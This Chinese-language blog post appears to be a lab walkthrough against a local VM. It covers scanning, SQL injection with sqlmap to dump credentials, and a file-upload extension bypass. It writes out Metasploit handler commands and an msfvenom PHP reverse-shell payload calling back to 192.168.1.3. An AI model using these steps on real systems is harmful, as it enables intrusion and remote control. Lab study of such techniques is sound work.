• 从SQL注入到进入服务器


    攻击机ip:192.168.1.3

    靶机ip:192.168.1.6

    首先,我们使用dirb命令和nmap进行扫描发现了以该ip为url的网站

    仔细搜寻该页面发现个Admin栏,点击发现了一个登陆页面

    然后我们使用owasp-zap扫描器扫描该网站

    在博主准备使用时发现我的kali居然没有自带这个工具,百度了以下才发现原因竟然时当时没怎么更新,被kali移除了,不过现在又可以下载了

    使用apt-get install zaproxy这条命令就可以下载安装了

    那么我们开始扫描这个网站吧!

    发现如下漏洞

     既然存在sql注入漏洞,那么我们就可以利用该漏洞进入数据库拿用户名和密码了,使用sqlmap进行爆破!得到用户名和密码如下

     password下面那个长长的字符串时密码的哈希值,将其解码就得到了后面那个密码

    那么我们就可以使用这个账号和密码进行登陆服务器了!

    然后发现了一串文字,说上传图片,那就以为着还存在文件上传漏洞!那我们试试能不能让服务器自己反弹个shell回显到kali终端。不过在这之前我们先要启动监听。

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 攻击机IP地址

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > run

    然后我们在制作一个木马

    我们可以利用metasploit生成shell,命令如下:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 -f raw > /root/Desktop/shell.php 然后就会在桌面生成一个名为shell.php的shell,然后在上传到服务即可

    但是我们发现它对上传的文件的后缀名进行了验证,必须是.PHP才可以上传

     既然如此,那我们就把shell的后缀名改成PHP就行了。上传成功后,点击该文件,执行文件。

    但是此时来问题了,终端给我回显了个这个

     不知道为啥是从本地反弹shell给了本地???这咋整?有知道的师傅给支个儿招吗?

  • 相关阅读:
    CentOS中基于不同版本安装重复包的解决方案
    诺讯科技
    SQLMap使用
    python初码
    优秀软件project师必备的7大特性
    3.2 Piecewise Linear Interpolation(站点)
    C#开发Unity游戏教程之游戏对象的属性变量
    java 线程 原子类相关操作演示样例 thinking in java4 文件夹21.3.4
    一键解决ScrollView嵌套ListView仅仅显示一行的问题
    W5500中断寄存器的理解
  • 原文地址:https://www.cnblogs.com/Hbbbb/p/12680727.html
Copyright © 2020-2023  润新知